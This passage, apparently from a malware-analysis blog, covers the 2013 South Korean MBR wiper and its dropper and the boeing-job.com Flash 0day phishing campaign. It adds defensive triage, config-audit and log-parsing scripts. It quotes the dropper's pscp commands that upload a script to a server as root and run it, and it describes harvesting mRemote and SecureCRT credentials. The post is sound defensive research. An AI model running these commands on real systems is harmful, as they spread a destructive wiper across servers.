| Strings | PRINCPES / HASTATI. / \Temp\~v3.log |
| Check "~v3.log" | Yes |
| Task kill | pasvc.exe (AhnLab Policy Agent) / clisvc.exe (Hauri ViRobot) |
| Wiper timing | Not immediate if ~v3.log is present |
| Shutdown | shutdown -r -t 0 |
| Other names | ApcRunCmd.exe / K01 |
| Mentioned by | contagio & Symantec & Tripwire |
This sample takes into account the presence of “~v3.log” in the “C:\WINDOWS\Temp\” directory. If the file is present, the wipe process is not started. This sample could be categorized as Wiper.
But you have to take into consideration that this sample is normally executed by the 9263E40D9823AECF9388B64DE34EAE54 dropper, and that the complete process will be analyzed in the “9263E40D9823AECF9388B64DE34EAE54 Dropper Analysis” chapter of this blog.
| MD5 | f0e045210e3258dad91d7b6b4d64e7f3 |
| Size | 24 KB |
| Compilation timedatestamp | 2013-01-31 10:27:18 |
| File mapping object | JO840112-CRAS8468-11150923-PCI8273V |
| Strings | PRINCPES / HASTATI. / \Temp\~v3.log |
| Check "~v3.log" | Yes |
| Task kill | pasvc.exe (AhnLab Policy Agent) / clisvc.exe (Hauri ViRobot) |
| Wiper timing | Not immediate if ~v3.log is present |
| Shutdown | shutdown -r -t 0 |
| Other names | ApcRunCmd.exe / K02 |
| Mentioned by | contagio |
Like the previous wiper, if “~v3.log” is present in the “C:\WINDOWS\Temp\” directory, the wipe process is not started.
This sample also seems to be part of another dropper that is not publicly known at the moment. This sample could be categorized as Wiper.
As you can see, all of the wipers use the “HASTATI” string to overwrite MBR data. As reported by security vendors, the term “Hastati” refers to a class of infantry in the armies of the early Roman Republic. The “PRINCPES” term, also used to overwrite MBR data, could refer to the “Principes”, who were veteran soldiers of the Roman pre-Marian army. Are the “bad guys” fans of the Roman army, or fans of the Total War game?
Another interesting relation to the “HASTATI” string used to overwrite MBR data is that the KBS TV website was defaced on 21 March with a “Defaced by HASTATI” message and a symbol representing the class of infantry in the armies of the early Roman Republic.
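As an added example (my own code, not from the post or from any vendor), the script below does a first static triage of a suspected sample from the indicators listed in the wiper tables above: the HASTATI./PR!NCPES MBR strings, the file mapping object name, the two killed AV processes, the \Temp\~v3.log path and the shutdown command. The sample blobs are constructed stand-ins for the K03 and K04 string sets. One caveat is built in: as the first table shows for 0a8032cd6b4a710b1771a080fa09fb87, a sample can carry the ~v3.log string and still wipe immediately, so the script only reports the reference and leaves the actual check behaviour to dynamic analysis.

```python
"""String-based triage of a suspected Dark South Korea wiper sample
(added example, not the post's code; sample blobs are constructed)."""
import re

# Indicators taken from the wiper tables above, grouped by what they mean.
MARKERS = {
    "mbr_overwrite": [b"HASTATI.", b"PR!NCPES", b"PRINCPES"],
    "file_mapping":  [b"JO840112-CRAS8468-11150923-PCI8273V"],
    "av_kill":       [b"pasvc.exe", b"clisvc.exe"],
    "marker_file":   [rb"\Temp\~v3.log"],
    "reboot":        [b"shutdown -r -t 0"],
}


def extract_strings(blob: bytes, min_len: int = 6) -> list[str]:
    """Printable-ASCII runs, the usual first look at an unknown PE."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def find_markers(blob: bytes) -> dict[str, list[str]]:
    """Which indicator groups are present; matching is case-insensitive
    because one reported sample spells the ViRobot process as Clisvc.exe."""
    low = blob.lower()
    hits = {}
    for group, needles in MARKERS.items():
        found = [n.decode("ascii") for n in needles if n.lower() in low]
        if found:
            hits[group] = found
    return hits


def triage(blob: bytes) -> dict:
    hits = find_markers(blob)
    if "mbr_overwrite" not in hits:
        verdict = "no wiper markers"
    elif "marker_file" in hits:
        # The path string alone does not prove the check is performed:
        # 0a8032cd6b4a710b1771a080fa09fb87 carries it and still wipes at once.
        verdict = "wiper; references ~v3.log, confirm the check dynamically"
    else:
        verdict = "wiper; no ~v3.log reference, expect an immediate wipe"
    return {"verdict": verdict, "markers": hits, "kills_av": "av_kill" in hits}


def _blob(*parts: bytes) -> bytes:
    """Glue constructed indicator strings together with non-printable junk."""
    junk = bytes([0x00, 0x01, 0x02, 0x03, 0xFF, 0xFE, 0x90]) * 3
    return junk.join(parts) + junk


# Constructed stand-ins for the K03 and K04 string sets and for a clean file.
SAMPLE_K03 = _blob(b"MZ", b"PR!NCPES", b"HASTATI.", rb"\Temp\~v3.log",
                   b"JO840112-CRAS8468-11150923-PCI8273V", b"pasvc.exe",
                   b"Clisvc.exe", b"shutdown -r -t 0")
SAMPLE_K04 = _blob(b"MZ", b"HASTATI.", b"JO840112-CRAS8468-11150923-PCI8273V",
                   b"pasvc.exe", b"clisvc.exe", b"shutdown -r -t 0")
SAMPLE_CLEAN = _blob(b"MZ", b"This program cannot be run in DOS mode", b"kernel32.dll")


def main():
    for name, blob in (("K03-like", SAMPLE_K03), ("K04-like", SAMPLE_K04), ("clean", SAMPLE_CLEAN)):
        result = triage(blob)
        print(f"{name}: {result['verdict']}; kills AV: {result['kills_av']}")
        print("  strings:", ", ".join(extract_strings(blob)))


if __name__ == "__main__":
    main()
```

To run it on a real file, pass `Path(sample).read_bytes()` to `triage()`; the same marker table converts directly into a YARA rule for fleet-wide hunting.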
9263E40D9823AECF9388B64DE34EAE54 Dropper Analysis
In this chapter of this long blog post, we will analyze some behaviors of the 9263e40d9823aecf9388b64de34eae54 dropper.
As mentioned by different security vendors and researchers, when executed the dropper extracts 4 files into the Windows “%TMP%” directory. These files are “alg.exe”, “conime.exe”, “~pr1.tmp” and “AgentBase.exe”.
“alg.exe” (e45cd9052dd3dd502685dfd9aa2575ca) is the “plink.exe” PuTTY tool, acting as a command-line interface to the PuTTY back ends. This binary was compiled on 2013-02-15 at 08:12:58.
“conime.exe” (6a702342e8d9911bde134129542a045b) is the “pscp.exe” PuTTY tool, acting as an SCP client, i.e. command-line secure file copy. This binary was compiled on 2006-03-13 at 14:32:44.
“~pr1.tmp” (dc789dee20087c5e1552804492b042cd) is a bash script that will be dropped and executed on *NIX servers under certain conditions.
“AgentBase.exe” (db4bbdc36a78a8807ad9b15a562515c4) is the wiper mentioned in the previous chapters of this blog post.
After installing these files, the dropper checks for the presence of the “~v3.log” file in the “C:\WINDOWS\Temp\” directory.
If the “~v3.log” file does not exist, the “AgentBase.exe” wiper is executed, killing AhnLab Policy Agent (pasvc.exe) and Hauri ViRobot ISMS Client (clisvc.exe), then erasing all data.
If the “~v3.log” file exists, the dropper starts checking for the presence of the “confCons.xml” configuration file of the mRemote program, developed by Felix Deimel, and for the presence of the configuration files of the SecureCRT program, developed by VanDyke Software, Inc.
For mRemote, the dropper copies all the data related to SSH connections with root login present in the “confCons.xml” configuration file, and exploits a vulnerability in the password storage engine of this program. When you save connections in mRemote, it outputs all of that data into an XML file, “confCons.xml”. The passwords are saved in an encrypted format; however, this is trivial to circumvent, so despite the passwords being saved in encrypted form it is easy to decrypt them. This vulnerability was discovered and published by Cosine Security on 2 June 2011. Support for mRemote was stopped in 2012.
Once the mRemote vulnerability is exploited, the dropper starts a new process to execute the “conime.exe” binary, in order to drop the “~pr1.tmp” file into “/tmp/cups” on the targeted server:
“C:\Users\ERICRO~1\AppData\Local\Temp\conime.exe -batch -P 22 -l root -pw test C:\Users\ERICRO~1\AppData\Local\Temp\~pr1.tmp 192.168.178.54:/tmp/cups”
After the upload of the “cups” file, the dropper executes this file through the following command:
“C:\Users\ERICRO~1\AppData\Local\Temp\conime.exe -batch -P 22 -l root -pw test 192.168.178.54 "chmod 755 /tmp/cups;/tmp/cups"”
For SecureCRT, the dropper also copies all data related to SSH connections with a root login present in the “*.ini” configuration files. Each saved connection in SecureCRT has its own “*.ini” file, which is parsed by the dropper. The passwords are also saved in an encrypted format.
With the latest version of SecureCRT (7.0.3), the dropper is unable to decrypt the password, but still tries to connect to the targeted servers with a wrong password. So there is surely a similar vulnerability as for mRemote in previous versions of SecureCRT, but I wasn’t able to find it.
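As an added example (not the dropper’s code, nor mRemote’s), this is the check a defender can run on a workstation to list which saved mRemote connections fall into exactly the category the dropper harvests: SSH connections with a root login and a stored password. The confCons.xml attribute names (Node, Type, Username, Password, Hostname, Protocol, Port) are assumed from the mRemote 1.x layout and the sample file is constructed; nothing here decrypts anything.

```python
import xml.etree.ElementTree as ET

# Constructed sample confCons.xml in the assumed mRemote layout (attribute names
# are an assumption about the 1.x format, not taken from mRemote or the dropper).
SAMPLE_CONFCONS = """\
<Connections Name="Connections" Export="false" ConfVersion="2.5">
  <Node Name="db-prod" Type="Connection" Username="root" Password="ENCRYPTEDBLOB=="
        Hostname="10.0.0.5" Protocol="SSH2" Port="22" />
  <Node Name="Linux" Type="Container">
    <Node Name="web-01" Type="Connection" Username="deploy" Password="ENCRYPTEDBLOB=="
          Hostname="10.0.0.6" Protocol="SSH2" Port="22" />
    <Node Name="jump" Type="Connection" Username="root" Password=""
          Hostname="10.0.0.7" Protocol="SSH2" Port="2222" />
  </Node>
  <Node Name="win-rdp" Type="Connection" Username="root" Password="ENCRYPTEDBLOB=="
        Hostname="10.0.0.8" Protocol="RDP" Port="3389" />
</Connections>
"""


def find_exposed_root_ssh(xml_text):
    """Return (name, hostname, port) for every saved SSH connection that uses the
    root login and has a stored password: the entries the dropper would copy."""
    root = ET.fromstring(xml_text)
    exposed = []
    for node in root.iter("Node"):          # iter() also walks nested containers
        if node.get("Type") != "Connection":
            continue
        if not node.get("Protocol", "").upper().startswith("SSH"):
            continue
        if node.get("Username") != "root" or not node.get("Password"):
            continue
        exposed.append((node.get("Name"), node.get("Hostname"), node.get("Port", "22")))
    return exposed


if __name__ == "__main__":
    for name, host, port in find_exposed_root_ssh(SAMPLE_CONFCONS):
        # Each hit is a credential that should be rotated and removed from the file.
        print(f"{name}: root@{host}:{port} has a stored password")
```

On a real host, point `find_exposed_root_ssh` at the contents of the user’s confCons.xml; every entry returned is a root credential that a compromised workstation would hand to the dropper.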
Boeing-job.com Campaign and Adobe Flash 0days: Additional Information
On 7 February, Adobe issued security bulletin APSB13-04 for Adobe Flash Player to address two vulnerabilities, CVE-2013-0633 and CVE-2013-0634, exploited in the wild.
CVE-2013-0633 (CVSS base score of 9.3) is exploited by tricking a Windows user into opening a Microsoft Word document containing malicious Flash content. CVE-2013-0634 (CVSS base score of 9.3) is exploited by tricking an Apple OS X user into opening a web page containing malicious Flash content through Firefox or Safari. But this vulnerability is also exploited by tricking a Windows user into opening a Microsoft Word document containing malicious Flash content.
Affected products are:
- Adobe Flash Player 11.5.502.146 and earlier versions for Windows and Macintosh
- Adobe Flash Player 11.2.202.261 and earlier versions for Linux
- Adobe Flash Player 11.1.115.36 and earlier versions for Android 4.x
- Adobe Flash Player 11.1.111.31 and earlier versions for Android 3.x and 2.x
These vulnerabilities were discovered being exploited in the wild:
- For CVE-2013-0633, by Sergey Golovanov and Alexander Polyakov of Kaspersky Labs
- For CVE-2013-0634, by Shadowserver Foundation, MITRE and Lockheed Martin CIRT
As described by AlienVault Labs and by FireEye, the vulnerabilities were exploited through spear phishing email messages targeting several industries, including aerospace. One of the attached files used the 2013 IEEE Aerospace Conference schedule as a lure, and another reported sample was related to the online payroll system of the US company ADP.
Detailed analyses have been provided by AlienVault Labs, FireEye and Malware Must Die. All the analyses report the domain name ieee[.]boeing-job[.]com as the C&C server.
The boeing-job[.]com domain name was registered on 22 January 2013, through GoDaddy, with fake registration information.
On 5 February the http://ieee[.]boeing-job[.]com sub domain was pointing to IP 108.62.10.13, AS15003 in the US.
On 6 February http://boeing-job[.]com was pointing to IP 184.168.221.37, AS26496 in the US, a GoDaddy parking web page.
But, there is always a but: if you take a look in Google you can find the IP address that was used for www.boeing-job[.]com.
This sub domain was pointing to a legitimate website, http://www[.]grupo-gestion[.]com[.]ar, IP 200.123.160.138, AS16814 in Argentina.
By searching on urlQuery, you can find a submission from 5 February with this IP. And surprise: this submission concerns a “record.doc” document located in an “/adp/” directory. So we have the ADP Word document. urlQuery also reports an alert, “FILE-OFFICE Microsoft Office Word with embedded Flash file transfer”, for the “record.doc” document.
Now let’s analyze further the server used in the spear phishing campaign. By doing some research on Google, you will quickly find that weak tools are present on the server and that these tools are freely accessible from the Internet. After some further analysis, we can find that an old default XAMPP installation is present on this server, and that the bad guys used this weakness to install a PHP backdoor. The PHP backdoor was also not protected, giving full access to the server.
The related “/adp/” directory no longer contains the “record.doc” file, and most of the server seems to have been cleaned.
But I discovered an interesting “/jobs/” directory containing a well-known tool, the JSbug statistics backend, used in previous drive-by attack campaigns. The contents of the backend allow us to see that a campaign had been running since 22 January using the www.boeing-job[.]com domain name.
Also interesting is that the XAMPP Apache log files were accessible from the Internet without restrictions.
By doing some log analysis we can find the following information:
- The “record.doc” file size was 563200 bytes.
- The first access to the “/adp/record.doc” file with a 200 Apache return code was recorded at 05/Feb/2013:07:12:24 -0300.
- The “/adp/record.doc” file was removed from the server around 08/Feb/2013 09:23:24 -0300.
- Around 300 accesses to the “record.doc” file were made during this timeframe: 42 on 5 February, 7 on 6 February, 89 on 7 February and 161 on 8 February.
- A PHP backdoor had been present on the server since 05/Nov/2012 and was used multiple times.
- A second PHP backdoor was uploaded to the server on 8 February, at 08/Feb/2013 02:25:25 -0300 (surely used to remove the record.doc file). Why not use the first PHP backdoor? Surely because you are not the guy who deposited the “record.doc” file and you don’t know about the existence of the first PHP backdoor.
- The server was scanned for two days with Acunetix, starting at 02/Feb/2013 18:25:45 -0300.
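The figures above come from reading the exposed Apache access log. As an added example (not the post’s own tooling), here is the kind of script that extracts them: it parses combined-format lines, counts requests for “/adp/record.doc” per day, records the first successful (200) download with its byte size, and notes the first 404, which marks the moment the file was gone. The log lines are constructed; the timestamps and size follow the post, the client IPs and user agents are made up.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed Apache combined-log lines (client IPs and user agents are invented).
SAMPLE_LOG = """\
198.51.100.10 - - [05/Feb/2013:07:12:24 -0300] "GET /adp/record.doc HTTP/1.1" 200 563200 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"
198.51.100.11 - - [05/Feb/2013:07:40:02 -0300] "GET /adp/record.doc HTTP/1.1" 200 563200 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"
203.0.113.5 - - [05/Feb/2013:08:01:13 -0300] "GET /adp/ HTTP/1.1" 403 212 "-" "curl/7.26.0"
198.51.100.12 - - [07/Feb/2013:11:15:44 -0300] "GET /adp/record.doc HTTP/1.1" 200 563200 "-" "Mozilla/5.0"
198.51.100.13 - - [08/Feb/2013:09:23:24 -0300] "GET /adp/record.doc HTTP/1.1" 404 289 "-" "Mozilla/5.0"
"""

# Common/combined log format: ip ident user [timestamp] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def analyse_access(log_text, path="/adp/record.doc"):
    """Summarise requests for one path: total hits, hits per day, first 200
    response (first successful download) with its size, and first 404."""
    summary = {"hits": 0, "per_day": Counter(), "first_200": None,
               "size": None, "first_404": None}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("path") != path:
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        status = m.group("status")
        summary["hits"] += 1
        summary["per_day"][ts.strftime("%Y-%m-%d")] += 1
        if status == "200" and summary["first_200"] is None:
            summary["first_200"] = ts
            summary["size"] = int(m.group("size"))
        if status == "404" and summary["first_404"] is None:
            summary["first_404"] = ts           # file no longer served from here on
    return summary


if __name__ == "__main__":
    s = analyse_access(SAMPLE_LOG)
    print(f"hits={s['hits']} per_day={dict(s['per_day'])} size={s['size']}")
    print(f"first 200: {s['first_200']}  first 404: {s['first_404']}")
```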
Additional analysis of the discovered “/jobs/” directory and JSbug backend provides the following interesting information:
- The “/jobs/” directory was first seen at 22/Jan/2013 06:12:44 -0300.
- Installation of the JSBug backend was done at 22/Jan/2013 06:13:16 -0300.
- Additional files were installed in the “/jobs/” directory, such as “img/jquery-1.8.3.min.js”, “img/logo.gif”, “check.php”, “download.htm”, “download.php”, “img/download.css”, “img/ff_step1.png”, “img/ie_step3.png”, “img/ff_step2.png” and “NProtect.exe”. “check.php”, “download.htm”, “NProtect.exe” and “download.php” are no longer present on the server.
By analyzing the files remaining on the server, used in a previous attack that started on 22 January, we can see files revealing that a spear phishing campaign was conducted against Boeing employees, in order to trick them into installing the “NProtect.exe” malware.